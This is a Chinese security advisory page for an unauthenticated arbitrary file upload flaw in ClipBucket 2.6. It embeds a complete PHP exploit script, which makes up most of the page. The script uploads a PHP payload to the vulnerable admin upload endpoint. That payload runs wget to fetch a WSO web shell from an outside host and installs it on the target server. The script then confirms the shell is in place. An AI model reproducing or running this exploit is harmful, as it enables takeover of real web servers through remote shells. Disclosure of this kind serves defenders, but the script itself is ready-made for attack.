发布日期:2013-10-02
更新日期:2013-11-01受影响系统:
ClipBucket ClipBucket 2.6
描述:
--------------------------------------------------------------------------------
ClipBucket是开源的自由视频共享软件。ClipBucket 2.6版本的"/admin_area/charts/ofc-library/ofc_upload_image.php" 脚本不需身份验证即允许上传任意代码,可导致任意shell上传。<*来源:vendor
链接:http://192.168.7.140/vul_2.php?vul_id=24181#vul_affect
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#################################################################################################
# __________.__ _________ _________
# \__ ___/| |__ ____ \_ ___ \_______ ______ _ ________ \_ ___ \_______ ______ _ __
# | | | | \_/ __ / /\_ __ / _ / / / ___/ / /\_ __ \_/ __ / / /
# | | | Y ___/ \____| | ( <_> ) /\___ \____| | / ___/ /
# |____| |___| /\___ > \______ /|__| \____/ /\_//____ > \______ /|__| \___ >/\_/
# / / / / / /
#
#
#http://thecrowscrew.org
#################################################################################################
# Exploit title : ClipBucket Remote Code Execution Vulnerability
# Author : Gabby
# Dork = use ur brain ;)
# Vendor Site : http://clip-bucket.com/
# Software Download : http://sourceforge.net/projects/clipbucket/
#################################################################################################
<?php
$options = getopt("t:n:");
if(!isset($options["t"], $options["n"]))
die("
[+] Simple Exploiter ClipBucket by Gabby [+]
Usage : php clip.php -t http://target.com -n bie.php
-t http://target.com = Target mu ..
-n bie.php = Nama file yang mau kamu pakai...
");
$target = $options["t"];
$nama = $options["n"];
$shell = "{$target}/admin_area/charts/tmp-upload-images/{$nama}";
$target = "{$target}/admin_area/charts/ofc-library/ofc_upload_image.php?name={$nama}";
$data = "<?php
system("wget http://gabby.ga/shell/wso.txt; mv wso.txt bie.php");
fclose ( $handle );
?>";
$headers = array("User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1",
"Content-Type: text/plain");
echo "============================================
";
echo ": Simple Exploiter ClipBucket by Gabby :
";
echo "============================================
";
echo "[+] Upload Shell ke : {$options["t"]}
";
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $target);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
if(!strpos($source, "Undefined variable: HTTP_RAW_POST_DATA") && @fopen($shell, "r"))
{
echo "[+] Exploit Sukses,.. :D
";
echo "[+] {$shell}
";
}
else
{
die("[-] Exploit Gagal,.. :(
");
}
?>see on ss :
1. http://i.imgur.com/SZGVraC.png
2. http://i.imgur.com/1X0WzeH.png################################################################################​#################
Thanks to :
Catalyst71, kit4r0, 777r, ovanIsmycode, walangkaji, y0g4, my "Dad", my sista Wii, cW3 G4pt3K,
Red-x, Vanda, Deb, Sultan, Meninbox, n all my luvly friend,..
Greets to :
Yogyacarderlink, SurabayaBlackhat,..^^
################################################################################​#################建议:
--------------------------------------------------------------------------------
厂商补丁:ClipBucket
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://clip-bucket.com/Mozilla Firefox/Thunderbird/SeaMonkey释放后重用内存破坏漏洞(CVE-2013-5597)Cisco IOS XE Software拒绝服务漏洞(CVE-2013-5543)相关资讯 ClipBucket
- ClipBucket /admin_area/charts/ (11/03/2013 07:43:24)
本文评论 查看全部评论 (0)
易网时代-编程资源站